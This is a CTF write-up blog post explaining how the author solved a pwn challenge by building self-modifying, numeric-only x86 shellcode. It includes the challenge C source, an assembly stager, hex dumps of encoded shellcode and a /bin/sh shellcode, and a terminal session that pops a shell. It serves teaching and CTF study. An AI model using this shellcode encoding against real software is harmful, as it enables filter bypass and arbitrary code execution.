Numeric Shellcode

2021-01-12

[+] Introduction

In December 2020 I competed in Deloitte’s Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges in various difficulties.

One of the final challenges to be released was called numerous presents. This task immediately piqued my interest as it was tagged with the category pwn.

The challenge description reads:

600 POINTS - NUMEROUS PRESENTS
You deserve a lot of presents!

Note: The binary is running on a Ubuntu 20.04 container
with ASLR enabled.  It is x86 compiled with the flags mentioned
in the C file. You can assume that the buffer for your shellcode
will be in eax.

Tip: use hardware breakpoints for debugging shellcode.

[+] Challenge code

The challenge is distributed as a .c file with no accompanying reference binary. Personally I’m not a big fan of this approach, the devil is in the details when it comes to binary exploitation, but let’s have a look:

#include <stdio.h>

// gcc -no-pie -z execstack -m32 -o presents presents.c

unsigned char presents[123456] __attribute__ ((aligned (0x20000)));

int main(void) {
	setbuf(stdout, NULL);
	puts("How many presents do you want?");
	printf("> ");
	scanf("%123456[0-9]", presents);
	puts("Loading up your presents..!");
	((void(*)())presents)();
}

Alright, at least the invocation for gcc is embedded as a comment, and the challenge code itself is brief and and straight forward. There is a static uninitialized buffer presents that resides in the .bss of the program. The libc routine scanf is used to fill this buffer and jump to it. There is one catch though, the format-string used here is %123456[0-9]. This uses the %[ specifier to restrict the allowed input to only the ASCII literals for the numbers 0 till 9 (0x30-0x39).

So essentially they are asking us to write a numeric only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence to be found that this is possible when restricted to alpha-numeric characters, but what about numeric-only?

Long story short: yes it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately though, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario.

[+] Diving in

If we set up a clean Ubuntu 20.04 VM and apt install build-essential and build the provided source, we end up with a binary which has the presents global variable located at 0x08080000. Examining the disassembly listing of main we can see the function pointer invocation looks like this:

 mov eax, 0x8080000
 call eax

So indeed, like the challenge description suggested EAX contains a pointer to our input/shellcode.

So what kind of (useful) instructions can we generate with just 0x30-0x39? Instead of staring at instruction reference manuals and handy tables for too long I opted to brute-force generate valid opcode permutations and disassemble+dedup them.

[+] Exclusive ORdinary Instructions

There was no easy instructions to do flow control with numerics only, let alone a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind of scratchpad memory as is often seen with alphanumeric shellcoding. Let’s look at some obviously useful candidates though.. they are all xor operations.

34 xx          -> xor al, imm8
30 30          -> xor byte ptr [eax], dh
32 30          -> xor dh, byte ptr [eax]
32 38          -> xor bh, byte ptr [eax]
35 xx xx xx xx -> xor eax, imm32

Ofcourse, any immediate operands have to be in the 0x30-0x39 range as well. But these instructions provide a nice starting point. xor byte ptr [eax], dh can be used to (self-)modify code/data if we manage to point eax to the code/data we want to modify. Changing eax arbitrarily is a bit tricky; but with the help of xor eax, imm32 and xor al, imm8 we can create quite a few usable addresses. (More on this in a bit)

Writing numeric only shellcode is all about expanding your arsenal of primitives, in a way that eventually yields a desired end result. If we were to start mutating opcodes/instructions using the xor [eax], dh primitive, we need to have a useful value in dh first.

[+] Bootstrapping

If we look at the register contents of ebx and edx in the context of this particular challenge, we see that ebx points to the start of the .got.plt section (0x0804c000) and edx is clobbered with the value 0xffffffff at the time the trampoline instruction (call eax) to our shellcode is being executed.

In short, bh = 0xc0 and dh = 0xff.

If we start our journey like this:

xor byte ptr [eax], dh  ; *(u8*)(eax) ^= 0xff (== 0xcf)
xor dh, byte ptr [eax]  ; dh ^= 0xcf (== 0x30)
xor bh, byte ptr [eax]  ; bh ^= 0xcf (== 0x0f)

We end up with some (what I would call) useful values in both dh and bh. What exactly makes 0x30 and 0x0f useful though? Well for one, by xor’ing numeric code with 0x30 we can now (relatively) easily introduce the values 0x00-0x09.

To be able to arbitrarily carve certain bytes in memory I picked a method that relies on basic add arithmetic. add byte ptr [eax], dh and add byte ptr [eax], bh are almost numeric only. They start with a 0x00 opcode byte though. But this value can now be carved by xor’ing with dh, which contains 0x30.

Here it becomes useful that we have a value in dh which only has bits set in the upper nibble, and a value in bh which only has bits set in the lower nibble. By combining a (reasonable!) amount of add arithmetic using bh and dh as increment values we can carve any value we want.

So let’s say we want to produce the value 0xCD (CD 80 happens to be a useful sequence of bytes when writing x86/Linux shellcode ;-)).

start value = 0x31
0x31 + (0x30 * 2) = 0x91
0x91 + (0x0f * 4) = 0xcd

as you can see, with a total of 6 add operations (2 with bh and 4 with bh) we can easily construct the value 0xCD if we start with a numeric value of 0x31. It is fine if we overflow, we are only working with 8bit registers.

[+] Pages and overall structure

Having the ability to turn numeric bytes into arbitrary bytes is a useful capability, but it heavily relies on being able to control eax to pick what memory locations are being altered.

Let’s try to think about our eax-changing capabilities for a bit. We have the xor eax, imm32 and xor al, imm8 instructions at our disposal. Of course, the supplied operands to these instructions need to be in the numeric range.

By chaining two xor eax, imm32 operations it becomes possible to set a few nibbles in EAX to arbitrary values, while not breaking the numeric-only rule for the operands. By adding an optional xor al, 0x30 to the end we can toggle the upper nibble of the least significant byte of eax to be 0x30. This gives us a nice range of easily selectable addresses.

A quick example would look something like this:

; eax = 0x08080000, our starting address
xor eax, 0x30303130 ; eax = 0x38383130
xor eax, 0x30303030 ; eax = 0x08080100
xor al, 0x30        ; eax = 0x08080130

Lets treat the lower 16bits of eax as our selectable address space, we have the ability to select addresses in the form of 0x08080xyz where x and z can be anything between 0 and f and y can be either 3 or 0. In essence, we can easily increase/decrease eax with a granularity of 0x100 and within each 0x100-sized page (from here on, page) we can select addresses 00-0f and 30-3f.

I came up with a structure for the shellcode where each page starts with code that patches code in the same page at offset 0x30 and higher, and the code at offset 0x30 and higher in the page then patches the final shellcode. Indeed, we’re using self-modifying code that needs to be self-modified before it can self-modify (yo dawg).

Roughly, the layout of our pages look like this:

000: setup code
100: page_patcher_code_0 (patches shellcode_patcher_code_0)
130: shellcode_patcher_code_0 (patches shellcode)
200: page_patcher_code_1 (patches shellcode_patcher_code_1)
230: shellcode_patcher_code_1 (patches shellcode)
...
f00: shellcode that gets modified back into original form

This means we can have a maximum of up to 14 patch pages (we lose page 0 to setup code), which doesn’t allow us to use very big shellcodes. However, as it turns out, this is enough for a read(stdin, buffer, size) syscall, which was good enough to beat this challenge, and (in general) is enough for staging a larger shellcode.

[+] Padding

With our limited addressing there’s quite a bit of ‘dead’ space we can’t easily address for modifying. We’ll have to find some numeric-only nop operation so we can slide over these areas. Most of our numeric instructions are exactly 2 bytes, except for xor eax, imm32 which is 5 bytes. The xor eax, imm32 is always used in pairs though, so our numeric code size is always evenly divisble by 2. This means we can use a 2-byte nop instruction and not run into any alignment issues.

I picked cmp byte ptr [eax], dh (38 30) as my NOP instruction, as eax always points to a mapped address, and the side-effects are mininmal. Another option would’ve been to use the aaa instruction (37), which is exactly 1 byte in size. But it clobbers al in some cases, so I avoided it.

[+] Putting it all together

Initially while I was developing this method I manually put together these self modifying numeric only contraptions (well, with some help of GNU assembler macro’s).. which works but is quite a painful and error prone process.

Eventually I implemented all the details in an easy to use python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection, and calculating the optimal amount of mutation instructions for generating the shellcode.

Do note, this tool was written with the challenge I was facing. You’ll want to modify the three constants (EDX, EBX, EAX) at the top if you plan to reuse my exact tooling.

[+] Popping a shell

So we’ll write a quick stager shellcode that is compact enough to be num-only-ified. It will use the read syscall to read the next stage of shellcode from stdin. We’ll put the destination buffer right after the stager itself, so there’s no need for trailing nop instructions or control flow divertion. The careful reader will notice I’m not setting edx (which contains the size argument for the read syscall) here since its already set to a big enough value.

bits 32
global _start
_start:
mov ecx, eax ; ecx = eax
add ecx, 0xd ; ecx = &_end
xor ebx, ebx ; stdin
xor eax, eax
xor al, 3    ; eax = NR_read
int 0x80
_end:

That should do the trick. Time to run it through the tool and give it a shot.

$ nasm -o stager.bin stager.asm

$ xxd stager.bin
00000000: 89c1 83c1 0d31 db31 c034 03cd 80         .....1.1.4...

$ python3 numeric_gen.py stager.bin stager_num.bin
[~] total patch pages: 14
[>] wrote numeric shellcode to 'stager_num.bin'
[~] old length: 13 bytes, new length 3853 (size increase 29638.46%)

$ xxd stager_num.bin
00000000: 3030 3230 3238 3530 3030 3035 3031 3030  0020285000050100
00000010: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000020: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000030: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
...
00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000f00: 3931 3531 3231 3031 3034 3431 32         9151210104412

$ xxd binsh.bin
00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989  1...Phn/shh//bi.
00000010: e389 c1b0 0b52 5153 89e1 cd80            .....RQS....

$ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents
How many presents do you want?
> Loading up your presents..!
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
echo w00t
w00t
^C

Success! As you can see our final numeric shellcode weighs in at 3853 bytes. A little under 4KiB, and well within the allowed limit of 123456 characters.

[+] Closing words

I hope you enjoyed this article, and I’m eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days. ;-)

– blasty